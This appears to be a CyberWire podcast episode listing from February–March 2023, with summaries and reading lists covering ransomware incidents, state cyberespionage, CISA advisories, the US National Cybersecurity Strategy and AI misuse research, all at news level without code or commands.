    New IceFire version is out. A DUCKTAIL tale. Social engineering by Tehran. DPRK's LIGHTSHOW cyberespionage. The President's Budget and cybersecurity. The US Department of Defense issues its cyber workforce strategy. Remcos surfaces in attacks against Ukrainian government agencies. DDoS at a Ukrainian radio station. Dave Bittner sits down with Beth Robinson of Bishop Fox to share their 2023 Offensive Security Resolutions. Caleb Barlow from Cylete on the security implications of gigapixel images. And CISA releases five ICS advisories.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/47


    Selected reading.

    IceFire Ransomware Returns | Now Targeting Linux Enterprise Networks (SentinelOne)

    DUCKTAIL: Threat Operation Re-emerges with New LNK, PowerShell, and Other Custom Tactics to Avoid Detection (Deep Instinct)

    Iran-linked hackers used fake Atlantic Council-affiliated persona to target human rights researchers (CyberScoop)

    Iranian APT Targets Female Activists With Mahsa Amini Protest Lures (Dark Reading)

    Iran threat group going after female activists, analyst warns (Cybernews)

    Stealing the LIGHTSHOW (Part One) — North Korea's UNC2970 (Mandiant)

    Stealing the LIGHTSHOW (Part Two) — LIGHTSHIFT and LIGHTSHOW (Mandiant)

    Cybersecurity in the US President's Budget for Fiscal Year 2024. (CyberWire)

    Biden’s budget proposal underscores cybersecurity priorities (Washington Post)

    Biden Budget Proposal: $200M for TMF, CISA With 4.9% Budget Boost (Meritalk)

    Cybersecurity Poised for Spending Boost in Biden Budget (Gov Info Security)

    Deputy Secretary of Defense Signs 2023-2027 DoD Cyber Workforce Strategy (U.S. Department of Defense)

    In new cyber workforce strategy, DoD hopes 'bold' retention initiatives keep talent coming back (Breaking Defense)

    Remcos Trojan Returns to Most Wanted Malware List After Ukraine Attacks (Infosecurity Magazine)

    February 2023’s Most Wanted Malware: Remcos Trojan Linked to Cyberespionage Operations Against Ukrainian Government (Check Point Software)

    Radio Halychyna cyber-attacked following appeal by Russian hacker group (International Press Institute)

    CISA Releases Five Industrial Control Systems Advisories | CISA (Cybersecurity and Infrastructure Security Agency CISA)


    PlugX is now wormable. Compromised webcams found. Emotet is back. AI builds a keylogger. Cyber in the hybrid war. BEC comes to productivity suites. Mar 09, 2023

    A wormable version of the PlugX USB malware is found. Compromised webcams as a security threat. Emotet botnet out of hibernation. Proof-of-concept: AI used to generate polymorphic keylogger. Turning to alternatives as conventional tactics fail. Dave Bittner speaks with Eve Maler of ForgeRock to discuss how digital identity can help create a more secure connected car experience. Johannes Ullrich from SANS on configuring a proper time server infrastructure. And phishing messages via legitimate Google notifications.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/46


    Selected reading.

    A border-hopping PlugX USB worm takes its act on the road (Sophos News)

    BitSight identifies thousands of global organizations using insecure webcams and other IoT devices, finding many susceptible to eavesdropping (BitSight)

    Emotet malware attacks return after three-month break (BleepingComputer)

    BlackMamba: Using AI to Generate Polymorphic Malware (HYAS)

    Russian Cyberwar in Ukraine Stumbles Just Like Conventional One (Bloomberg)

    Australian official demands Russia bring criminal hackers ‘to heel’ (The Record by Recorded Future)

    Russia will have to rely on nukes, cyberattacks, and China since its military is being thrashed in Ukraine, US intel director says (Business Insider)

    BEC 3.0 - Legitimate Sites for Illegitimate Purposes (Avanan)


    Data breaches and IP. Current cyberespionage campaigns. A warning that the cyber phases of the hybrid war can’t be expected to be over, yet. Exfiltration via machine learning inference. Mar 08, 2023

    CISA adds three known exploited vulnerabilities to its Catalog. A data breach at Acer exposes intellectual property. Sharp Panda deploys SoulSearcher malware in cyberespionage campaigns. US Cyber Command’s head warns against underestimating Russia in cyberspace. Dave Bittner sits down with Simone Petrella of N2K Networks to discuss the recently released Defense Cyber Workforce Framework. Betsy Carmelite from Booz Allen Hamilton speaks about CISA's year ahead. And are large language models what the lawyers call an attractive nuisance?


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/45


    Selected reading.

    CISA Adds Three Known Exploited Vulnerabilities to Catalog (Cybersecurity and Infrastructure Security Agency CISA)

    March 7 CISA KEV Breakdown | Zoho, Teclib, Apache (Nucleus Security)

    Acer Confirms Breach After Hacker Offers to Sell Stolen Data (SecurityWeek)

    Acer confirms breach after 160GB of data for sale on hacking forum (BleepingComputer)

    “Sharp Panda”: Check Point Research puts a spotlight on Chinese origined espionage attacks against southeast asian government entities (Check Point Software)

    Pandas with a Soul: Chinese Espionage Attacks Against Southeast Asian Government Entities (Check Point Research)

    What can security teams learn from a year of cyber warfare? (Computer Weekly)

    Russian cyberattacks could intensify during spring offensives in Ukraine, US Cyber Command general says (Stars and Stripes)

    US Bracing for Bolder, More Brazen Russian Cyberattacks (VOA)

    Russia remains a ‘very capable’ cyber adversary, Nakasone says (C4ISRNet)

    Employees Are Feeding Sensitive Business Data to ChatGPT (Dark Reading)


    A new threat to routers. DoppelPaymer hoods collared. Ransomware hits a Barcelona hospital. Phishing in productivity suites. Espionage, hacktivism, and prank phone calls. Mar 07, 2023

    HiatusRAT exploits business-grade routers. International law enforcement action against the DoppelPaymer gang. Ransomware hits a major Barcelona hospital. Productivity suites are increasingly attractive as phishing grounds. Transparent Tribe’s romance scams. Cyberattacks briefly disrupt Russian websites and media outlets. Ashley Leonard, CEO of Syxsense, sits down with Dave to discuss their "Advancing Zero Trust Priorities" report. Joe Carrigan on a warning from Microsoft about a surge in token theft. And trolling for disinfo raw material.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/44


    Selected reading.

    Black Lotus Labs uncovers another new malware that targets compromised routers (Lumen Newsroom)

    Germany and Ukraine hit two high-value ransomware targets | Europol (Europol)

    European Police, FBI Bust International Cybercrime Gang (VOA)

    German police lift lid on worldwide cyber blackmail gang (Deutsche Welle)

    Europol Hits Alleged Members of DoppelPaymer Ransomware Group (Decipher)

    An international sting brings another win against ransomware gangs (Washington Post)

    European police move in on DoppelPaymer (Computing)

    Police Looking for Russian Suspects Following DoppelPaymer Ransomware Crackdown (SecurityWeek)

    Cyberattack hits major hospital in Spanish city of Barcelona (AP NEWS)

    Cyberattack Hits Major Hospital in Spanish City of Barcelona (SecurityWeek)

    Barcelona's Hospital Clinic hit by ransomware cyberattack 'from outside Spain' (Euro Weekly News)

    Phishers’ Favorites 2022 Year-in-Review (Vade)

    Kremlin Website Down Amid Reports of Cyber Attacks on Russia (The Daily Beast)

    Russian diplomat blames West for recruiting hackers for operations against Moscow (TASS)

    Don’t Answer That! Russia-Aligned TA499 Beleaguers Targets with Video Call Requests (Proofpoint)


    That crane might know what you’re shipping. Addressing the cybersecurity of water systems. Oakland’s ransomware incident is now a breach. Hybrid war. Investment scams. Mar 06, 2023

    Cranes as a security threat. EPA memo addresses cybersecurity risks to water systems. Oakland's ransomware incident becomes a data breach. Carding rises in the Russian underworld. Sandworm's record in Russia's war. Rick Howard sits down with Andy Greenberg from Wired to discuss how Ukraine suffered more data-wiping malware last year than anywhere, ever. Dave Bittner speaks with Kathleen Smith of ClearedJobs.Net to talk about hiring veterans and setting them (and yourself) up for success. And AI’s latest misuse: bogus investment schemes.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/43


    Selected reading.

    WSJ News Exclusive | Pentagon Sees Giant Cargo Cranes as Possible Chinese Spying Tools (Wall Street Journal)

    EPA Takes Action to Improve Cybersecurity Resilience for Public Water Systems (US EPA)

    EPA presses states to include cybersecurity in water safety reviews (SC Media)

    EPA Calls on States to Improve Public Water Systems’ Cybersecurity (Meritalk)

    EPA issues water cybersecurity mandates, concerning industry and experts (CyberScoop)

    City of Oakland Targeted by Ransomware Attack, Work Continues to… (City of Oakland).

    Ransomware gang leaks data stolen from City of Oakland (BleepingComputer)

    Ransomware hackers release some stolen Oakland data (CBS News)

    Oakland officials say ransomware group may release personal data on Saturday (The Record from Recorded Future News)

    Cybercrime site shows off with a free leak of 2 million stolen card numbers (The Record from Recorded Future News)

    A year of wipers: How the Kremlin-backed Sandworm has attacked Ukraine during the war (The Record from Recorded Future News)

    Bitdefender Labs warns of fresh phishing campaign that uses copycat ChatGPT platform to swindle eager investors (Hot for Security)


    Gabriela Smith-Sherman: Thriving in the chaos. [Cyber governance] [Career Notes] Mar 05, 2023

    Gabriela Smith-Sherman, a former Federal agency CISO with over 15 years of experience in leading and implementing comprehensive enterprise cybersecurity programs and initiatives, sits down to share her journey. She is a U.S. combat disabled veteran who understands the importance of mission and is dedicated to delivering high-quality results and value to customers through innovative solutions. Gabriela shares about her time in the military and how being a part of the service was one of the best decisions she made; she dedicates all her hard work to her time in the military. She also shares how it was tough getting out of the routine of the military, and that becoming a civilian was a hard transition, but she says that she thrives in the chaos of the IT world and that the military helped her to prepare for the cyber industry. She said "I think my military experience has prepared me, uh, to be in those kind of chaotic positions and be very calm about the approach." We thank Gabriela for sharing her story with us.


    New exploits are tricking Chrome. [Research Saturday] Mar 04, 2023

    Dor Zvi, Co-Founder and CEO of Red Access, joins to discuss their work on "New Chrome Exploit Lets Attackers Completely Disable Browser Extensions." A recently patched exploit is tricking Chrome browsers on all popular OSs to not only give attackers visibility of their targets’ browser extensions, but also the ability to disable all of those extensions.

    The research states that the exploit consists of a bookmarklet that allows threat actors to selectively force-disable Chrome extensions through a handy graphical user interface, by making Chrome mistakenly identify the request as a legitimate one from the Chrome Web Store.

    The research can be found here:

    • New Chrome Exploit Lets Attackers Completely Disable Browser Extensions

    More on how the US will implement its new National Cybersecurity Strategy. Emissary Panda and Mustang Panda are back. Responding to phishing. Royal ransomware. Water utility security. Mar 03, 2023

    Implementing the US National Cybersecurity Strategy. The US National Cybersecurity Strategy was informed by lessons from Russia's war. Two threat actors from China up their game. Responding to a phishing campaign. #StopRansomware: Royal Ransomware. CISA releases five ICS advisories. Sameer Jaleel, Kent State University Associate CIO, on closing functionality gaps and creating a safer digital environment for students. Johannes Ullrich from SANS on establishing an "End of Support" inventory. EPA issues a memo on water system cybersecurity.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/42


    Selected reading.

    National Cybersecurity Strategy (The White House)

    US cyber leaders discuss the new National Cyber Strategy. (CyberWire)

    Biden vows to wield ‘all instruments’ in fighting cyberthreats (Defense News)

    Chinese state-backed hackers Iron Tiger target Linux devices with new malware (Tech Monitor)

    Chinese hackers use new custom backdoor to evade detection (BleepingComputer)

    Scam alert: Trezor warns users of new phishing attack (Cointelegraph)

    FBI and CISA Release #StopRansomware: Royal Ransomware | CISA (Cybersecurity and Infrastructure Security Agency CISA)

    CISA Releases Five Industrial Control Systems Advisories | CISA (Cybersecurity and Infrastructure Security Agency CISA)

    EPA Takes Action to Improve Cybersecurity Resilience for Public Water Systems (US EPA)


    CISA Alert AA23-061A – #StopRansomware: Royal ransomware. Mar 03, 2023

    CISA and FBI are releasing this joint advisory to disseminate known Royal ransomware IOCs and TTPs identified through recent FBI threat response activities.

    AA23-061A Alert, Technical Details, and Mitigations

    AA23-061A STIX XML

    Royal Rumble: Analysis of Royal Ransomware (cybereason.com)

    DEV-0569 finds new ways to deliver Royal ransomware, various payloads - Microsoft Security Blog

    2023-01: ACSC Ransomware Profile - Royal | Cyber.gov.au

    See Stopransomware.gov, a whole-of-government approach, for ransomware resources and alerts.

    No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

    See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

    U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


    CISA Alert AA23-059A – CISA red team shares key findings to improve monitoring and hardening of networks. [CISA Cybersecurity Alerts] Mar 03, 2023

    The Cybersecurity and Infrastructure Security Agency is releasing this Cybersecurity Advisory detailing activity and key findings from a recent CISA red team assessment—in coordination with the assessed organization—to provide network defenders recommendations for improving their organization's cyber posture.

    AA23-059A Alert, Technical Details, and Mitigations

    No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

    See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

    U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


    CyberWire commentary: Ukraine one year on. [Special Edition] Mar 03, 2023

    CyberWire Daily podcast host Dave Bittner is joined by CyberWire editor John Petrik for an extended discussion about the Russian invasion of Ukraine and its effect on cybersecurity at the one year anniversary. John and his team have covered the Ukrainian conflict with daily news stories since the invasion began, and in fact, had quite a lot of coverage prior to the invasion. They take stock of where things stand, what has happened, and what we expected versus reality.


    The US National Cybersecurity Strategy is out, and we have a preliminary look. CISA red-teams critical infrastructure. A new cryptojacker is out. Russia bans messaging apps. Hacktivist auxiliaries. Mar 02, 2023

    The White House releases its US National Cybersecurity Strategy. Red-teaming critical infrastructure. Redis cryptojacker discovered. Russia bans several messaging apps. Our guest is Kapil Raina from CrowdStrike with the latest on Threat Hunting. Dinah Davis from Arctic Wolf on the top healthcare industry cyber attacks. And hacktivist auxiliaries continue their nuisance-level activities.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/41


    Selected reading.

    National Cybersecurity Strategy (The White House)

    FACT SHEET: Biden-Harris Administration Announces National Cybersecurity Strategy (The White House)

    Biden administration releases new cybersecurity strategy (AP NEWS)

    White House pushes for mandatory regulations, more offensive cyber action under National Cyber Strategy (The Record from Recorded Future News)

    Here's why Biden's new cyber strategy is notable (Washington Post)

    How the U.S. National Cyber Strategy Reaches Beyond Government Agencies (Wall Street Journal)

    Biden National Cyber Strategy Seeks to Hold Software Firms Liable for Insecurity (Wall Street Journal)

    CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks (Cybersecurity and Infrastructure Security Agency CISA)

    CISA red-teamed a 'large critical infrastructure organization' and didn't get caught (The Record from Recorded Future News)

    Redis Miner Leverages Command Line File Hosting Service (Cado Security | Cloud Investigation)

    Russia bans foreign messaging apps (Computing)

    U.S. Consulate hacked by "Putin supporters" (Newsweek)


    How an attack led to a breach that enabled further social engineering. Forensic visibility in the Google Cloud Platform. Hacktivist auxiliaries. Two 8Ks and a free decryptor. Mar 01, 2023

    The LastPass data breach built on an earlier attack. Forensic visibility and the Google Cloud Platform. An overview of hacktivist auxiliaries in Russia's war against Ukraine. Dish acknowledges sustaining a cyberattack. MKS Instruments discloses a ransomware incident. Carole Theriault has a lesson about ChatGPT and school systems. Ann Johnson from Afternoon Cyber Tea speaks with Stacy Hughes from Voya Financial about her journey to being CISO. And Bitdefender releases a decryptor for MortalKombat ransomware.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/40


    Selected reading.

    LastPass sustains a second data breach. (CyberWire)

    Incident 2 – Additional details of the attack (LastPass Support)

    LastPass Says DevOps Engineer Home Computer Hacked (SecurityWeek)

    LastPass: Keylogger on home PC led to cracked corporate password vault (Naked Security)

    LastPass data was stolen by hacking an employee’s home computer (The Verge)

    LastPass says employee’s home computer was hacked and corporate vault taken (Ars Technica)

    LastPass is in Big Trouble (Gizmodo)

    LastPass: DevOps engineer hacked to steal password vault data in 2022 breach (BleepingComputer)

    The LastPass security breach is still going from bad to worse (Cybersecurity Connect)

    Mitiga on forensic visibility and the Google Cloud Platform. (CyberWire)

    Mitiga Security Advisory: Insufficient Forensic Visibility in GCP Storage (Mitiga)

    Google Cloud Platform Exfiltration: A Threat Hunting Guide (Mitiga)

    The Cyber Warfare Report (GroupSense)

    Dish Network confirms ransomware attack behind multi-day outage (BleepingComputer)

    DISH tells SEC that ransomware attack caused outages; personal info may have been stolen (The Record from Recorded Future News)

    Ransomware attack on chip supplier causes delays for semiconductor groups (Financial Times)

    Bitdefender Releases Decryptor for MortalKombat Ransomware (Bitdefender Labs)

    Victims of MortalKombat ransomware can now decrypt their locked files for free (The Record from Recorded Future News)


    Data breach at the US Marshals Service. Blind Eagle phishes in the service of espionage. Dish investigates its outages. Qakbot delivered via OneNote files. Memory-safe coding. Feb 28, 2023

    The US Marshals Service sustains a data breach. Blind Eagle is a phish hawk. Dish continues to work toward recovery. OneNote attachments are used to distribute Qakbot. Ben Yelin has analysis on the Supreme Court’s hearing on a section 230 case. Mr Security Answer Person John Pescatore has thoughts on ChatGPT. And CISA Director Easterly urges vendors to make software secure-by-design.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/39


    Selected reading.

    U.S. Marshals Service investigating ransomware attack, data theft (BleepingComputer)

    US Marshals says prisoners’ personal information taken in data breach (TechCrunch)

    Blind Eagle Deploys Fake UUE Files and Fsociety to Target Colombia's Judiciary, Financial, Public, and Law Enforcement Entities (BlackBerry)

    Dish hit by multiday outage after reported cyberattack (TechCrunch)

    DISH says ‘system issue’ affecting internal servers, phone systems (The Record from Recorded Future News)

    Take Note: Armorblox Stops OneNote Malware Campaign (Armorblox)

    Ukraine & Intelligence: One Year on – with Shane Harris (SpyCast)

    U.S. cyber official praises Apple security and suggests Microsoft, Twitter need to step it up (CNBC)

    U.S. cyber chief warns tech companies to curb unsafe practices (CBS News)

    Tech manufacturers are leaving the door open for Chinese hacking, Easterly warns (The Record from Recorded Future News)

    CISA Director Calls Out Industry Using Consumers as Cyber 'Crash Test Dummies' (Nextgov.com)

    The Designed-in Dangers of Technology and What We Can Do About It (Cybersecurity and Infrastructure Security Agency)


    Artificial intelligence behaving badly? Or just tastelessly? Third-party risks. Signs that the advantage may be tilting toward the defender. Feb 27, 2023

    Social engineering with generative AI. Mylobot and BHProxies. PureCrypter is deployed against government organizations and staged through Discord. Dish Network reports disruption. Third-party app and software as a service risk. Further assessments of the cyber phase of Russia's war so far, with warnings to stay alert. Are tough times coming in gangland? Comments on NIST's revisions to its Cybersecurity Framework are due this Friday. AJ Nash from ZeroFox on Mis/Dis/and Malinformation. Rick Howard digs into Zero Trust. And get this—AI is writing science fiction!


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/38


    Selected reading.

    Social engineering with generative AI. (CyberWire)

    Who’s Behind the Botnet-Based Service BHProxies? (KrebsOnSecurity)

    Mylobot: Investigating a proxy botnet (Bitsight)

    PureCrypter targets government entities through Discord (Menlo Security)

    PureCrypter malware hits govt orgs with ransomware, info-stealers (BleepingComputer)

    Uncovering the Risks & Realities of Third-Party Connected Apps: ‍2023 SaaS-to-SaaS Access Report (Adaptive Shield)

    Ukraine war anniversary likely to bring ‘disruptive’ cyberattacks on West, agencies warn (Global News)

    How the Ukraine War Has Changed Russia’s Cyberstrategy (Foreign Policy)

    A year of wiper attacks in Ukraine (WeLiveSecurity)

    Russia's yearlong cyber focus on Ukraine (Axios)

    A year after Russia's invasion, cyberdefenses have improved around the world (Washington Post)

    One year on, how is the war playing out in cyberspace? (WeLiveSecurity)

    The Russia-Ukraine cyber war: one year later (IT World Canada)

    Russia launched large-scale operations in cyberspace alongside war (euronews)

    WSJ News Exclusive | Hackers Extort Less Money, Are Laid Off as New Tactics Thwart More Ransomware Attacks (Wall Street Journal)

    AI-generated fiction is flooding literary magazines — but not fooling anyone (The Verge)


    Mike Fey: Highs are high and lows are low. [CEO] [Career Notes] Feb 26, 2023

    Mike Fey, CEO and co-founder of Island.io, joins to share his story, falling in love with technology and being fascinated by it at a young age. Mike quickly started working for companies where he grew in his role, becoming CTO of McAfee and then GM of the Enterprise business, stepping out to then become president and COO of Blue Coat, which was eventually acquired by Symantec, eventually wanting to get into his own business. He shares that being a small business owner is a lot of hard work and very tiring at times, he says "especially in a startup, the highs are very high and the lows are very low." Mike also mentions how easy it is to get knocked down when being in charge of your own business, but that teamwork is what helps to bring him back up. Mike says he wants to eventually help change the world and hopefully his legacy will help him to do that some day. We thank Mike for sharing his story with us.


    The next hot AI scam. [Research Saturday] Feb 25, 2023

    Andy Patel from WithSecure Labs joins with Dave to discuss their study that demonstrates how GPT-3 can be misused through malicious and creative prompt engineering. The research looks at how this technology, GPT-3 and GPT-3.5, can be used to trick users into scams.

    GPT-3 is a user-friendly tool that employs an autoregressive language model to generate versatile natural language text from a small amount of input, which could inevitably interest cybercriminals. The research looks for possible misuse of this tool, such as phishing content, social opposition, social validation, style transfer, opinion transfer, prompt creation, and fake news.

    The research can be found here:

    • Creatively malicious prompt engineering

    A look at the cyber aspects of Russia’s war, on the first anniversary of the invasion of Ukraine. And a few notes from elsewhere in cyberspace. Feb 24, 2023

    CISA advises increased vigilance on the first anniversary of Russia's war. CERT-UA reports current Russian cyberattacks were prepared in December 2021. How the war has changed the cyber underworld. Air raid alerts sound in nine Russian cities; Russia blames hacking. Our space correspondent Maria Varmazis speaks with Zhanna Malekos Smith at the Center for Strategic & International Studies about a new security agreement between Japan and the US. Kathleen Smith of ClearedJobs.Net clears misperceptions about the cleared space. And Dole continues recovery from ransomware.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/37


    Selected reading.

    CISA Urges Increased Vigilance One Year After Russia's Invasion of Ukraine (Cybersecurity and Infrastructure Security Agency | CISA)

    Ukraine says Russian hackers backdoored govt websites in 2021 (BleepingComputer)

    Ukraine suffered more data-wiping malware than anywhere, ever (Ars Technica)

    The First Crypto War? Assessing the Illicit Blockchain Ecosystem One Year Into Russia's Invasion of Ukraine (TRM Insights)

    Ransomware Gang Conti Has Re-Surfaced and Now Operates as Three Groups: TRM Labs (CoinDesk)

    Ukraine suffered more data-wiping malware than anywhere, ever (Ars Technica)

    Russia-Ukraine War: 3 Cyber Threat Effects, 1 Year In (ReliaQuest)

    Russian cybercrime alliances upended by Ukraine invasion. Study: Old pacts ditched the moment Moscow moved in (Register)

    How the Russia-Ukraine war has changed cyberspace (The Hill)

    Authorities blame hackers after air raid sirens sound over radio in multiple Russian cities (Meduza)

    Russia blames 'hackers' for fake missile strike alerts (Register)

    Fruit giant Dole suffers ransomware attack impacting operations (BleepingComputer)

    Food giant Dole hit by ransomware (Computing)

    CISA Releases Three Industrial Control Systems Advisories (CISA)


    Hybrid war and cyber espionage. Ransomware in the produce aisle. Bypassing security filters in a BEC campaign. Identity-based attacks. Avoid pirated software. And what the bots have been scalping. Feb 23, 2023

    Cyberattacks in Russia's war so far, and their future prospects. The Lazarus Group may be employing a new backdoor. Clasiopa targets materials research organizations. Ransomware interferes with food production. Evernote is used in a BEC campaign to bypass security filters. Identity-based cyberattacks. Pirated versions of Final Cut Pro deliver cryptominers. Caleb Barlow has thoughts on Twitter, Mudge, and lessons learned. Marc Van Zadelhoff from the Cyber CEOs Decoded podcast speaks with Amanda Renteria, CEO of Code for America, about attracting diverse talent. And what have the scalper bots been up to lately?


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/36


    Selected reading.

    A year into Ukraine, looking back at 5 prewar predictions (Breaking Defense)

    Dutch intelligence: Many cyberattacks by Russia are not yet public knowledge (The Record from Recorded Future News)

    WinorDLL64: A backdoor from the vast Lazarus arsenal? (WeLiveSecurity)

    Clasiopa: New Group Targets Materials Research (Symantec)

    Cyberattack on food giant Dole temporarily shuts down North America production, company memo says (CNN Business)

    Business Email Compromise Scam Leads to Credential Harvesting Evernote Page (Avanan)

    The 2023 State of Identity Security Report (Oort)

    Beware of macOS cryptojacking malware. (Jamf Threat Labs)

    Quarterly Index: Top 5 Scalper Bot Targets of Q4 2022 (Netacea)


    Vulnerabilities newly exploited in the wild. A new cyberespionage campaign. Trends in the C2C marketplace. Hacktivists, other auxiliaries, and the laws of armed conflict. Feb 22, 2023

    CISA adds three entries to its Known Exploited Vulnerabilities Catalog. "Hydrochasma" is a new cyberespionage threat actor. IBM claims the biggest effect of cyberattacks in 2022 was extortion. Social network hijacking in the C2C market. A credential theft campaign against data centers. LockBit claims an attack on a water utility in Portugal. Tim Starks from the Washington Post describes calls to focus on harmonizing cyber regulations. Our guest is Luke Vander Linden, host of the RH-ISAC Podcast. Disrupting Mr. Putin's speech, online, and what the hybrid war suggests about the future of cyber auxiliaries.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/35


    Selected reading.

    CISA Adds Three Known Exploited Vulnerabilities to Catalog (CISA)

    Hydrochasma: Previously Unknown Group Targets Medical and Shipping Organizations in Asia (Symantec)

    IBM Security X-Force Threat Intelligence Index 2023 (IBM)

    S1deload Stealer – Exploring the Economics of Social Network Account Hijacking (Bitdefender Labs)

    Cyber Attacks on Data Center Organizations (Resecurity)

    Hackers Scored Data Center Logins for Some of the World's Biggest Companies (Bloomberg)

    LockBit gang takes credit for attack on water utility in Portugal (The Record from Recorded Future News)

    Ukraine Suffered More Data-Wiping Malware Last Year Than Anywhere, Ever (WIRED)

    Ukrainian hackers claim disruption of Russian TV websites during Putin speech (The Record from Recorded Future News)

    Ukraine's volunteer cyber army could be model for other nations: experts (Newsweek)

    Ukraine's largest charity wants to raise $1.3 million for ‘cyber offensive’ (The Record from Recorded Future News)


    GoDaddy's compromise. Twitter disables SMS authentication for all but blue-checked users. Deutsche DDoS. Is Bing channeling Tay? Feb 21, 2023

    GoDaddy has discovered a compromise of its systems. Twitter disables SMS authentication for those not subscribed to Twitter Blue. Last week’s cyber incident impacting German airports was confirmed to be DDoS. The consequences of irregular participation in cyber wars. Semiconductor tech giant Applied Materials sees significant financial losses from a cyberattack. Joe Carrigan on scammers dangling fake job offers to students. Our guests are Max Shuftan & Monisha Bush from the SANS Institute, on the reopening of their HBCU Cyber Academy application window. And is Bing channeling Tay?


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/34


    Selected reading.

    GoDaddy Inc. - Statement on recent website redirect issues (GoDaddy)

    GoDaddy: Hackers stole source code, installed malware in multi-year breach (Bleeping Computer)

    GoDaddy SEC Filing (SEC)

    An update on two-factor authentication using SMS on Twitter (Twitter)

    Twitter Limits SMS-Based 2-Factor Authentication to Blue Subscribers Only (The Hacker News)

    SMS-Based 2FA Will Be Limited to Twitter Blue Users (HackRead)

    Twitter will limit uses of SMS 2-factor authentication. What does this mean for users? (NPR)

    Twitter's Two-Factor Authentication Change 'Doesn't Make Sense' (WIRED)

    Twitter Shuts Off Text-Based 2FA for Non-Subscribers (SecurityWeek)

    Official: Twitter will now charge for SMS two-factor authentication (The Verge)

    German airport websites downed by DDoS attacks (Register)

    German airports hit by DDoS attack, ‘Anonymous Russia’ claims responsibility (The Record from Recorded Future)

    Russian phishing attacks flooded Ukraine, tripled against NATO nations in 2022: Report (Breaking Defense)

    Civilian hackers could become military targets, Red Cross warns (The Record from Recorded Future News)

    I helped create a 'cyber army' to help Ukraine defeat Russia. We can't fight with guns, but we can fight with our laptops. (Business Insider)

    How Uncle Sam enlisted Big Tech to thwart Russia from launching catastrophic cyberwar (The Washington Times)

    Big Tech Descends on Munich Conference in Support of Ukraine (Bloomberg)

    Applied Materials will take a $250M hit to sales this quarter, thanks to a cyberattack at one of its suppliers (Silicon Valley Business Journal)

    Semiconductor industry giant says ransomware attack on supplier will cost it $250 million (The Record by Recorded Future)

    How should AI systems behave, and who should decide? (OpenAI)

    Why Bing Is Being Creepy (Intelligencer)

    Microsoft's new chatbot is a liar. And it says it's ready to call the cops. (Mother Jones)

    After AI chatbot goes a bit loopy, Microsoft tightens its leash (Washington Post)

    My Week of Being Gaslit and Lied to by the New Bing (Information)


    Modernizing the U.S. Navy's cybersecurity posture. [Special Edition] Feb 20, 2023

    Dave Bittner had a conversation with Commander Brandon Campbell of US Navy Cyber Defense Operations Command and Captain Steve Correia, Commanding Officer of Naval Network Warfare Command. They discussed the Navy’s cybersecurity advances and how they have implemented them.

    Commander Brandon Campbell is the former Operations Director at Navy Cyber Defense Operations Command and Task Force 1020 where they protect, detect, and respond to global cyber threats against Navy networks.

    Captain J. Steve Correia is the Commanding Officer of Naval Network Warfare Command and the Commander of Task Force 1010 under the U.S. Navy’s Fleet Cyber Command where they execute tactical-level command and control to direct, operate, maintain and secure Navy communication and network systems.


    Rachel Tobac: Find a way to laugh. [CEO] [Career Notes] Feb 19, 2023

    Rachel Tobac, CEO from SocialProof Security sits down to share her amazing story on becoming what's known in the industry as an ethical hacker and CEO of a company. Rachel shares how she was always fascinated with spy movies and as she grew older that fascination turned into a real desire. Finding out she liked learning how the human brain works, she decided to start off in neuroscience. Wanting a change and with the help of her husband she was able to start getting more into hacking, finding she loved the fact that she was pretending to be someone to hack into a company and finding the weak spots. She shares how as a leader now she likes to be authentic with her team. She says "I think in the security world sometimes we take ourselves pretty seriously and a lot of times it's because we're dealing with really serious topics, and so in the moment we have to be extremely serious, but when you get a five minute break in between your crisis meetings, find a way to laugh if you can." We thank Rachel for sharing her story with us.


    Implementing and achieving security resilience. [Research Saturday] Feb 18, 2023

    Wendy Nather from Cisco sits down with Dave to discuss their work on "Cracking the Code to Security Resilience: Lessons from the Latest Cisco Security Outcomes Report." The report describes what security resilience is, while also going over how companies can achieve this resilience.

